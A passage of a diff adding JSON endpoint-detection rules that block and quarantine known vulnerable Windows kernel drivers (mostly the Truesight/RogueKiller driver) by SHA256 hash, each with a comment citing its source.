+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975903Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f",
+ "comment": "Gigabyte vulnerable driver (aka GVCIDrv64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a8d6e31c-2f47-5fdb-a6a2-279d836ebb0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822055Z",
+ "creation_date": "2026-03-23T11:45:31.822057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822062Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82332e1e23c95106444745ac4975655c2fb43dd2581cb5a0a7c403d242620aae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a8f40473-7bca-5b34-959a-959ce87f18c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819001Z",
+ "creation_date": "2026-03-23T11:45:30.819003Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b63080bead00cae92efb917b7a707c6a2d6628a1e90301795617b45273f45e4",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a8f8e945-9959-55b2-809d-a5336b7acd2c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155540Z",
+ "creation_date": "2026-03-23T11:45:31.155542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155548Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4255097a76fd5653a0812c19698bc5d6807c9bf82447372d50bda5aa337b87d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a8f955ec-7fd2-5ccf-b844-cfa509e9f632",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811309Z",
+ "creation_date": "2026-03-23T11:45:31.811312Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811317Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "882c8e61c7f61166fedde3dfa41c5231493eb2c7d3f3a068d45c77099841705f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a91c0766-1f22-5a44-955f-63c360b0c1f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477987Z",
+ "creation_date": "2026-03-23T11:45:30.477990Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477999Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7614d88ed04e2d3bf0798380e04b90e04d87a785fbd99f994206da8d9658fe5",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a91e53bc-0e7d-534c-841d-b14898b9a87c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147535Z",
+ "creation_date": "2026-03-23T11:45:31.147537Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147543Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33c33ebb9a0fe4b3a808564f581e4151185e9240b46193b71bf0ad9636820b6b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a921cd92-6242-57bf-a88d-fbe618aa4fd9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480654Z",
+ "creation_date": "2026-03-23T11:45:31.480658Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480668Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "903cf9cdd5b50d6ddc1c781daab91f3b7f22bf373ce80dd4d2e7fb75c6421135",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a92544e1-5238-5a87-9328-bde059a00338",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488811Z",
+ "creation_date": "2026-03-23T11:45:31.488813Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488818Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22d60ad34fc8e926e334e4be48c63926a0ccd5e2ae63df76cc4d66bc09040b3b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a92fa5ad-4152-5bd1-8acc-827488fb2211",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608865Z",
+ "creation_date": "2026-03-23T11:45:29.608867Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608882Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ab14c5c89759695dbb4b310b7cad68d9ec2007277e3b4f3abb883bd05ef557c",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a9358759-9878-5228-921a-c66f1c84e1dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146636Z",
+ "creation_date": "2026-03-23T11:45:31.146639Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146644Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b718a3c789cba79f67320edb91dc04d297ffeabdf81fc462ba8507254003c69c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a93e66d5-2d06-5084-a4af-1bb092d2ee3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618984Z",
+ "creation_date": "2026-03-23T11:45:29.618985Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618991Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e52bb23d6e4572fda5318addb4dad602629c8f254b8e6c4baf4033dddf13d660",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a93f2d22-5176-5690-ba76-d273e43544c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832370Z",
+ "creation_date": "2026-03-23T11:45:30.832372Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832377Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cfaf896771945c790bed21d17cb91891263412a96d191d020ce12e1a85319c9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a94304b5-724c-57e0-b43c-2b02753f4e6b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482315Z",
+ "creation_date": "2026-03-23T11:45:31.482342Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482351Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c63f144892f434182835baceaa8f24a13710b68b0bfee977a7faa9510f9a322f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a9479d8c-5923-5430-ac76-03540b10726f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147331Z",
+ "creation_date": "2026-03-23T11:45:31.147333Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71a0e584e9bc1e4c2bc4ac4b158b9a376938ff83d8083f957435ee115ca5cb02",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a94ab1ce-622f-5329-8f98-ef7f970daad1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814915Z",
+ "creation_date": "2026-03-23T11:45:31.814918Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814927Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b304dc8d6a996218f4ccdb6e554aa2af7b0aadf5c1313e3c5dc0b621b7adf43a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a94ceae0-6a78-58cd-afa6-e163bec8a068",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808020Z",
+ "creation_date": "2026-03-23T11:45:31.808023Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808032Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b4ca02a619b738037fff6a64cc299ca7568ac3af82d97b599e08f89988f4f2ca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a9513968-7fb2-5cad-824d-bdf1ff9195c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144964Z",
+ "creation_date": "2026-03-23T11:45:31.144966Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144971Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d71593b9dfebaf98bed630fd89f57ee5649bc1e1cb339e6b6ed4187163adead2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a9598a09-2caf-5f1b-b1ac-7ef16c3aef5e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489899Z",
+ "creation_date": "2026-03-23T11:45:31.489903Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489912Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48b13939682024b6545c0aaefc90e572165a3d2cc595aa91a3f4d113182e4c86",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a961da03-0fae-564c-88e4-279e1735934f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145000Z",
+ "creation_date": "2026-03-23T11:45:31.145002Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e8a5adfd141736db5c947223a1af06dd03f70042abcaa752b17ccdaa4d9875c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a961f377-057a-5de7-8c91-e51869e4a61c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149057Z",
+ "creation_date": "2026-03-23T11:45:31.149059Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149064Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17cc31dcac3a7e10a0f15b71ab36ed6b8c5fae610f2c83e16b93eba184479eb7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a989bb3d-7634-5588-9310-21cfc24a46f2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154466Z",
+ "creation_date": "2026-03-23T11:45:31.154468Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154473Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1851a1ba633ec04fed253c346f4e0e7530fcf8256e0c385f3c63e0b868d5e662",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a98d4993-24ff-54f7-925f-3bcac49eb1d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144559Z",
+ "creation_date": "2026-03-23T11:45:32.144561Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144567Z",
+ "rule_level": null,
